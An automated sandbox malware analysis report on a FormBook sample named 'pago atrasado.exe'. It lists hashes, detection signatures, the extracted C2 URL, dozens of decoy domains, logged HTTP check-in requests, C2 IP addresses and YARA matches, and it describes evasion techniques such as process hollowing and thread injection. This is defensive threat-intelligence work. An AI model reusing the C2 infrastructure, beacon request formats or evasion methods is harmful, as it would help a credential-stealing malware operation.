Windows Analysis Report pago atrasado.exe

Overview

General Information

Sample Name: pago atrasado.exe
Analysis ID: 502137
MD5: f841c72b1c4cadc4c98903ad26a96a16
SHA1: 06359aaf42a5ce60889ab7a93d8af7702b34630a
SHA256: eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
Tags: exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}
Yara detected FormBook
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: pago atrasado.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.pago atrasado.exe.2330000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.colorcpl.exe.4a4796c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 16.2.colorcpl.exe.2b2c88.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.pago atrasado.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.pago atrasado.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: pago atrasado.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00405E93 FindFirstFileA,FindClose, 0_2_00405E93
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054BD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 4x nop then pop ebx 1_2_00406AB4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop ebx 16_2_02B06AB5

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.crisisinterventionadvocates.com
Source: C:\Windows\explorer.exe Domain query: www.ttemola.com
Source: C:\Windows\explorer.exe Network Connect: 208.91.197.27 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 46.101.121.244 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.134 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.baybeg.com
Source: C:\Windows\explorer.exe Domain query: www.everythangbutwhite.com
Source: C:\Windows\explorer.exe Domain query: www.highvizpeople.com
Source: C:\Windows\explorer.exe Domain query: www.itskosi.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.oddanimalsink.com
Source: C:\Windows\explorer.exe Domain query: www.ishhs.xyz
Source: C:\Windows\explorer.exe Domain query: www.sfcn-dng.com
Source: C:\Windows\explorer.exe Domain query: www.umgaleloacademy.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.ishhs.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.crisisinterventionadvocates.com/u9xn/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1Host: www.highvizpeople.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1Host: www.oddanimalsink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1Host: www.everythangbutwhite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.91.197.27 208.91.197.27
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:44:25 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 13 Oct 2021 14:44:46 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Left.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Right.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: pago atrasado.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: pago atrasado.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.Highvizpeople.com
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.everythangbutwhite.com
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.everythangbutwhite.com/
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FL
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2F
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=ns
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/display.cfm
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/px.js?ch=1
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/px.js?ch=2
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTp
Source: unknown DNS traffic detected: queries for: www.highvizpeople.com
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1Host: www.highvizpeople.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1Host: www.oddanimalsink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1Host: www.everythangbutwhite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404FC2

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
